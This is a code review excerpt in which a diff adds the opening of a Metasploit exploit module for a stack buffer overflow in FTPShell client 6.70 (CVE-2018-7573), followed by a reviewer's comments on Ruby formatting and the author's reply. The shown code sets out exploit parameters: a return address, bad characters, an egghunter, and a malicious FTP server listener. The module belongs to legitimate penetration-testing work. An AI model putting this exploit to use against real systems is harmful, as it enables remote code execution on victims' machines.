modules/exploits/windows/ftp/ftpshell_cli_bof.rb

```diff
@@ -0,0 +1,107 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Seh
+  include Msf::Exploit::Remote::Egghunter
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
+          code execution.
+        },
+      'Author'   =>
+        [
+          'r4wd3r',                                            # Original exploit author
+          'Daniel Teixeira <danieljcrteixeira[at]gmail.com>'   # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-7573'],
+          [ 'EDB', '44596' ]
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 400,
+          'BadChars' => "\x00\x22\x0d\x0a\x0b"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # CALL ESI in FTPShell.exe : 0x00452eed
+          [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'SRVHOST' => '0.0.0.0',
+          'EXITFUNC' => 'thread'
+        },
+      'DisclosureDate' => 'May 15 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
```

Comment:
Single quotes are preferred when string interpolation isn't required.

Also, my personal preference is to format `register_options` as follows when there's only one option with a short description.

```ruby
    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
```

or:

```ruby
    register_options [
      OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ])
    ]
```

Reply:
Fixed the register_options.